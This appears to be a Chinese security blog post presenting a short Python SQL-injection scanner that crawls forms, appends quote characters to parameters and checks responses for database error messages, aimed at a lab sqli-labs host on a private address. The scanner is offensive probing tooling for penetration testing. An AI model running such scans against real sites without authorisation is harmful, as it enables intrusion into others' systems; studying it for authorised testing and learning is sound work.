漏洞利用-SQL注入扫描器 - HolaSecurity

漏洞利用-SQL注入扫描器

2024-3-08 18:30

|

263

|

0

|

|

2024-3-08 18:30

|

hola

179 字

|

6 分钟

本文最后更新于 420 天前，其中的信息可能已经有所发展或是发生改变。

:::info
💘渗透全流程：
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::

SQL注入扫描器

参考 sqlmap

构造参数，sql 逃逸

发送请求

分析回显

V1.0

#! /usr/bin/env python

'''
SQL Inject Scaner
'''

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
from fake_useragent import UserAgent

ua = UserAgent()
s = requests.Session()
s.headers['User-Agent'] = ua.random

def get_all_forms(url):
    soup = BeautifulSoup(s.get(url).content, 'lxml')
    return soup.find_all('form')

def get_form_details(form):
    details = {}
    try:
        action = form.attrs.get('action').lower()
    except:
        action = None
    method = form.attrs.get('method', 'get').lower()
    inputs = []
    for input_tag in form.find_all('input'):
        input_type = input_tag.attrs.get('type', 'text')
        input_name = input_tag.attrs.get('name')
        input_value = input_tag.attrs.get('value')
        inputs.append({
            'type': input_type,
            'name': input_name,
            'value': input_value
        })
    details['action'] = action
    details['method'] = method
    details['inputs'] = inputs
    return details

def is_vulnerable(response):
    # print(response.content.decode().lower())
    errors = {
        'you have an error in your sql syntax',
        'warning:mysql',
        'unclosed quotation mark after the charcter string'
    }
    for error in errors:
        if error in response.content.decode().lower():
            return True
    return False

def scan_sql_injection(url):
    chars = '\"\'-)'
    chars = '\''
    # Get 请求
    for c in chars:
        new_url = f"{url}{c}"
        print('[*] trying ... %s' % new_url)
        res = s.get(new_url)
        if is_vulnerable(res):
            print('[+] this url has sql injection vul...')
            return

    # Post 请求
    forms = get_all_forms(url)
    for form in forms:
        form_details = get_form_details(form)
        for c in chars:
            data = {}
            # print(form_details['inputs'])
            for input_tag in form_details['inputs']:
                if input_tag['type'] == 'hidden' or input_tag['value']:
                    try:
                        data[input_tag['name']] = input_tag['value'] + c
                        # print(data[input_tag['name']])
                    except:
                        pass
                elif input_tag['type'] != 'submit':
                    data[input_tag['name']] = f'test{c}'
                    # print(data[input_tag['name']])

            url = urljoin(url, form_details['action'])
            res = ''
            if form_details['method'] == 'post':
                print('[*] try send a post method... data: %s' % data)
                res = s.post(url, data=data)
            elif form_details['method'] == 'get':
                print('[*] try send a get method... params: %s' % data)
                res = s.get(url, params=data)
            if is_vulnerable(res):
                print('[+] this url has sql injection vul... \nparams: %s' % form_details)
                break

if __name__ == '__main__':
    url = 'http://192.168.225.135/Less-1/?id=1' # Get 请求
    url = 'http://192.168.225.135/Less-11/' # Post 请求
    scan_sql_injection(url)

学海无涯，回头是岸。 --- hola

python 武器库

暂无评论

发送评论编辑评论

Markdown

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!